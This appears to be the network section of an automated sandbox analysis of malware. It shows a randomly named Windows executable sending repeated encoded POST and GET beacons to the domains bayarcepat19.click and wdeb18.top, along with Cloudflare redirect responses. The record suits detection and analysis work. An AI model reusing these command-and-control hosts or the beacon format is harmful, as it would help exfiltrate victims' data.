                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.550003188.114.97.3801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:05.341459036 CET745OUTPOST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 49 55 39 56 59 4c 4f 63 45 57 54 67 7a 63 63 63 66 33 4e 4b 59 61 32 59 58 30 39 61 58 71 58 4a 62 5a 31 6e 6b 53 46 50 36 44 4a 4a 54 69 4f 78 32 6e 4c 45 49 48 52 56 36 75 73 58 73 5a 32 6b 31 6f 42 53 74 45 69 43 78 4c 6c 4c 6c 32 2f 4c 4e 74 45 2f 5a 57 54 36 44 34 31 50 57 47 30 43 51 4c 4b 78 50 44 5a 51 7a 68 6e 61 4d 5a 54 66 6c 77 48 70 45 45 6c 4f 73 61 63 77 66 6c 63 50 45 44 4c 77 58 4b 4f 4d 7a 64 68 45 6a 2f 69 71 74 34 54 44 30 52 30 61 45 43 6c 69 41 65 4c 56 6c 6d 56 31 63 56 73 43 36 56 31 71 64 71 4b 46 38 4d 7a 59 41 69 4e 76 33 37 6f 3d
                                                                    Data Ascii: vxPD=j61RLW+4xQmTIU9VYLOcEWTgzcccf3NKYa2YX09aXqXJbZ1nkSFP6DJJTiOx2nLEIHRV6usXsZ2k1oBStEiCxLlLl2/LNtE/ZWT6D41PWG0CQLKxPDZQzhnaMZTflwHpEElOsacwflcPEDLwXKOMzdhEj/iqt4TD0R0aECliAeLVlmV1cVsC6V1qdqKF8MzYAiNv37o=
                                                                    Oct 30, 2024 04:58:05.942195892 CET1031INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:05 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:05 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knq%2Fjg8Gj8oBQIJ7oL5moW30zRv493CfDFFj%2B8YLaBNYnISnw4Z8mCW4Twj0tdWDoy79NL5rRpzT8znnXnrNkzwRLWT8saraNS%2B3cfzt7ikY7X8xQiQWG1HAEPAIGb0L6fPknmQrlgj1"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c26a8ff3066-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1306&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.550004188.114.97.3801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:07.891411066 CET765OUTPOST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 4b 31 4e 56 61 6f 57 63 56 32 54 68 74 4d 63 63 49 6e 4e 57 59 61 71 59 58 78 46 4b 58 35 6a 4a 62 34 46 6e 71 77 39 50 33 6a 4a 4a 62 43 4f 30 79 6e 4c 61 49 48 64 72 36 75 41 58 73 5a 79 6b 31 6f 52 53 74 7a 4f 46 79 37 6c 4a 71 57 2f 4a 44 4e 45 2f 5a 57 54 36 44 34 68 32 57 48 51 43 51 37 36 78 4f 69 5a 58 36 42 6e 5a 62 70 54 66 68 77 48 74 45 45 6c 73 73 59 34 57 66 67 59 50 45 43 37 77 58 62 4f 4c 6f 74 68 34 2b 76 6a 44 6c 36 7a 4b 39 58 6c 51 42 6a 6b 43 52 59 43 78 74 77 34 66 47 33 6b 71 70 31 5a 53 4e 35 43 79 74 38 53 78 61 42 64 66 70 73 2f 34 77 66 70 59 6d 7a 4c 54 47 4b 44 77 6b 69 53 64 70 33 78 55
                                                                    Data Ascii: vxPD=j61RLW+4xQmTK1NVaoWcV2ThtMccInNWYaqYXxFKX5jJb4Fnqw9P3jJJbCO0ynLaIHdr6uAXsZyk1oRStzOFy7lJqW/JDNE/ZWT6D4h2WHQCQ76xOiZX6BnZbpTfhwHtEElssY4WfgYPEC7wXbOLoth4+vjDl6zK9XlQBjkCRYCxtw4fG3kqp1ZSN5Cyt8SxaBdfps/4wfpYmzLTGKDwkiSdp3xU
                                                                    Oct 30, 2024 04:58:08.498311996 CET1029INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:08 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FXR9WePhiUPBH3CA5acdxDqbWI0CXzZxC6zAVlhEPM1AuJ2KXKxPVzN%2BZTRq9N4mPBpfvOFiNQGMGQKN5Ah3Ud4XVRykFfw8zxYaDrf7etUaMS3Vei0psWxo1VLVYmijrvvs2cZdDMa"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c36aa392e55-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.550005188.114.97.3801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:10.437376022 CET1782OUTPOST /g48c/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.bayarcepat19.click
                                                                    Origin: http://www.bayarcepat19.click
                                                                    Referer: http://www.bayarcepat19.click/g48c/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 6a 36 31 52 4c 57 2b 34 78 51 6d 54 4b 31 4e 56 61 6f 57 63 56 32 54 68 74 4d 63 63 49 6e 4e 57 59 61 71 59 58 78 46 4b 58 34 62 4a 62 4f 52 6e 71 58 70 50 34 44 4a 4a 56 69 4f 31 79 6e 4b 47 49 48 45 73 36 75 38 70 73 62 61 6b 30 4c 4a 53 72 47 36 46 70 72 6c 4a 6f 57 2f 4d 4e 74 46 2f 5a 57 44 45 44 34 78 32 57 48 51 43 51 35 53 78 61 44 5a 58 32 68 6e 61 4d 5a 54 62 6c 77 48 56 45 46 4d 54 73 59 73 67 65 54 67 50 46 69 72 77 62 4e 53 4c 6b 74 68 41 2f 76 6a 62 6c 36 2b 53 39 54 38 70 42 6a 41 6b 52 66 4f 78 75 46 5a 54 57 30 67 7a 2f 48 6c 78 44 62 2b 6b 36 72 4f 55 63 79 70 73 6f 38 7a 4b 33 39 35 38 77 48 6a 50 55 36 57 7a 6d 58 57 4c 75 32 77 45 50 35 39 49 4a 74 7a 45 78 6e 6b 45 2f 42 51 76 6b 42 32 71 58 4a 77 6a 2b 47 57 35 45 30 74 50 33 48 66 75 73 5a 49 4b 6c 31 49 41 55 42 76 53 50 4e 70 4c 2b 74 73 58 2b 45 33 61 62 37 42 46 7a 4d 4e 46 31 4a 6f 69 75 73 76 54 44 45 54 2f 73 73 68 32 67 5a 65 56 51 2b 31 77 59 67 56 2b 6e 43 34 76 72 79 57 76 6b 38 75 6f 47 76 6f 46 47 [TRUNCATED]
                                                                    Data Ascii: vxPD=j61RLW+4xQmTK1NVaoWcV2ThtMccInNWYaqYXxFKX4bJbORnqXpP4DJJViO1ynKGIHEs6u8psbak0LJSrG6FprlJoW/MNtF/ZWDED4x2WHQCQ5SxaDZX2hnaMZTblwHVEFMTsYsgeTgPFirwbNSLkthA/vjbl6+S9T8pBjAkRfOxuFZTW0gz/HlxDb+k6rOUcypso8zK3958wHjPU6WzmXWLu2wEP59IJtzExnkE/BQvkB2qXJwj+GW5E0tP3HfusZIKl1IAUBvSPNpL+tsX+E3ab7BFzMNF1JoiusvTDET/ssh2gZeVQ+1wYgV+nC4vryWvk8uoGvoFGlrOJeNVm2T1n+UhUpHdGWAyEp6r1ba/ZkH28ib1JgPNMDMBiQlrDGZ1AazYO9uEcg9s2xTV3h9zseUzmYcStH7Hms/veQDqLs6G/KcpeaqT+CzA0iXF199srs18HwffVWun7nSdEdf6uPcigmsgJAI5YlWuPI5Ao6hrUx5CzbujtdGgDi9XRfUVvln/wR82LNauxaIbkgcSBQEgGzlyQql5vgtHBvuDeOMVm8j4GHqpoOwhebWgfmXnyWirOuO6UIxAsZDAWbgIoPJzkjhWfxRLlhfvXyN1TAmTXhQyeae9AJXjPOBbWYba2s7ZJ7hen4lb3Dfz4kVdJ6IeOAUPecG8ANFitkoy/3a0bIqymkLwBth9UJJLMU378pMZ7R7+tQzHyDWDW++BbMHRfBaRrRjJszzI9MJnq7ijMvLQ5B3DcHlV7MYPo5YStmn7rD4xiATw3aE9vi+HHzQ3U3+cm6LfDS40BYbKd3iAocY8Vdc9a/Yf4zOfl2h5q2EGKq8bGOuc/0GV15iOR+TbAGAZN990FEeC5w/5sNQvlzDCBQpGCbxCPyyGAfoti+93JtpFVEJKChTSwl6hnaQWnD6DCUTjDX9igbj2/BuX5Z06GohSpNlWFbbHYmb84PoJGBSzovc04e0Wdo3LKajF8PW0uyuhKVVvwdAUkf6 [TRUNCATED]
                                                                    Oct 30, 2024 04:58:11.039511919 CET1035INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:10 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:10 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Otnzjtrdb3yWZZJXTRG76t%2B2saHGR8XPTu6qGAZdkDhhjQY88LFxWmy8MpdGAo6nH0AG5PkG8xt0NQ%2BVcQVBQeaPC%2FLOB7JuPZwR1FknhK9%2FUOctmS%2FEkCxGHk3w2YHZ3rKkstZhnyk"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c468eb6ddb0-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.550006188.114.97.3801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:12.976897955 CET477OUTGET /g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.bayarcepat19.click
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:58:13.599725008 CET1166INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 30 Oct 2024 03:58:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 167
                                                                    Connection: close
                                                                    Cache-Control: max-age=3600
                                                                    Expires: Wed, 30 Oct 2024 04:58:13 GMT
                                                                    Location: https://www.bayarcepat19.click/g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v0bPkzQiNsWJVD6waWIQTD1l0VCTb7Jn99TwY2HTQKkqhu%2FMVxp%2FzK3nXKr%2B8%2BIlfRzEOnEqxDg5ULIekTwNaeVTWam1z6qE2QkQWqyTy8uTbYKuB1kf%2BR7NgzlBjwJ37OBLfaMKY4Tp"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da87c568ac2143d-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=477&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.550007206.119.82.147801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:18.677511930 CET721OUTPOST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 77 67 51 4d 71 6b 6a 2f 63 58 61 6f 4b 6f 33 64 6d 74 6e 72 37 47 52 50 44 69 49 70 43 47 4d 6b 35 31 6f 6f 64 41 4f 7a 42 4f 65 2b 71 39 64 42 6e 44 35 49 38 52 72 63 79 4a 63 6e 43 31 74 4a 55 38 6d 55 56 4b 4c 70 54 70 4e 41 68 6d 50 76 4b 39 77 51 4b 6c 42 36 46 61 55 35 49 77 6f 34 5a 48 4f 4b 36 46 59 35 75 36 56 72 31 2f 6d 2f 42 44 4f 51 76 78 57 77 56 4e 45 49 58 42 48 6e 51 6b 50 37 65 4c 4b 61 38 36 6c 74 71 36 4d 54 4d 6e 55 6c 56 55 39 39 6b 32 67 4e 36 78 2b 4f 4d 55 37 76 70 37 71 31 52 6d 50 33 35 4e 47 33 4e 79 6a 54 53 78 65 55 75 4e 49 3d
                                                                    Data Ascii: vxPD=7OFv+ElOXEe7wgQMqkj/cXaoKo3dmtnr7GRPDiIpCGMk51oodAOzBOe+q9dBnD5I8RrcyJcnC1tJU8mUVKLpTpNAhmPvK9wQKlB6FaU5Iwo4ZHOK6FY5u6Vr1/m/BDOQvxWwVNEIXBHnQkP7eLKa86ltq6MTMnUlVU99k2gN6x+OMU7vp7q1RmP35NG3NyjTSxeUuNI=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.550008206.119.82.147801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:21.220747948 CET741OUTPOST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 78 41 67 4d 6c 6e 4c 2f 65 33 61 76 57 59 33 64 73 4e 6e 76 37 47 74 50 44 6a 63 44 43 30 6f 6b 35 51 45 6f 50 78 4f 7a 43 4f 65 2b 68 64 64 45 6f 6a 35 42 38 52 6e 2b 79 4c 49 6e 43 78 46 4a 55 39 32 55 56 34 6a 75 53 35 4e 43 36 57 4f 70 46 64 77 51 4b 6c 42 36 46 61 41 54 49 30 45 34 5a 32 65 4b 37 6e 77 2b 74 36 56 30 79 2f 6d 2f 57 54 50 58 76 78 57 47 56 4d 59 75 58 44 76 6e 51 6c 2f 37 64 61 4b 5a 70 71 6c 72 30 4b 4d 46 42 58 78 39 4e 48 56 69 34 31 55 4a 74 77 4f 6a 4a 69 57 46 7a 5a 69 64 43 47 6a 50 70 65 4f 41 63 43 43 36 49 53 4f 6b 77 61 66 58 45 4e 77 65 77 48 72 74 4c 48 4a 67 63 65 4f 63 59 73 57 38
                                                                    Data Ascii: vxPD=7OFv+ElOXEe7xAgMlnL/e3avWY3dsNnv7GtPDjcDC0ok5QEoPxOzCOe+hddEoj5B8Rn+yLInCxFJU92UV4juS5NC6WOpFdwQKlB6FaATI0E4Z2eK7nw+t6V0y/m/WTPXvxWGVMYuXDvnQl/7daKZpqlr0KMFBXx9NHVi41UJtwOjJiWFzZidCGjPpeOAcCC6ISOkwafXENwewHrtLHJgceOcYsW8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.550009206.119.82.147801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:58:23.767502069 CET1758OUTPOST /jo6v/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.wdeb18.top
                                                                    Origin: http://www.wdeb18.top
                                                                    Referer: http://www.wdeb18.top/jo6v/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 37 4f 46 76 2b 45 6c 4f 58 45 65 37 78 41 67 4d 6c 6e 4c 2f 65 33 61 76 57 59 33 64 73 4e 6e 76 37 47 74 50 44 6a 63 44 43 30 67 6b 34 6d 51 6f 65 69 32 7a 44 4f 65 2b 2f 74 64 46 6f 6a 34 54 38 52 76 36 79 4c 46 53 43 33 42 4a 55 61 32 55 58 4a 6a 75 62 35 4e 43 79 32 50 75 4b 39 78 53 4b 6d 34 7a 46 61 51 54 49 30 45 34 5a 31 32 4b 38 31 59 2b 68 61 56 72 31 2f 6d 37 42 44 50 7a 76 77 2f 7a 56 50 30 59 51 7a 50 6e 51 46 76 37 66 73 6d 5a 6f 4b 6c 70 31 4b 4e 47 42 58 4e 63 4e 47 35 6d 34 30 68 6b 74 33 36 6a 49 45 76 4d 32 59 48 62 41 32 6d 73 37 50 75 54 43 47 76 66 49 42 79 79 79 36 6e 66 4a 4d 49 38 6c 44 54 51 50 58 59 32 43 4a 65 48 64 36 48 42 73 62 6e 76 75 74 61 31 47 33 34 49 50 6d 5a 54 4b 58 6b 65 54 38 79 71 4a 42 6a 52 68 38 77 36 53 56 63 6f 37 38 6b 56 54 75 62 4a 30 6c 5a 4e 62 78 38 66 2b 67 66 7a 70 52 68 6b 67 67 30 41 4b 4f 48 46 34 7a 6e 44 73 66 75 51 2b 4b 50 67 33 6c 58 36 74 49 51 4e 47 6f 63 61 67 46 50 4f 6d 4c 66 74 37 6d 44 74 74 33 6c 75 45 6d 71 55 51 [TRUNCATED]
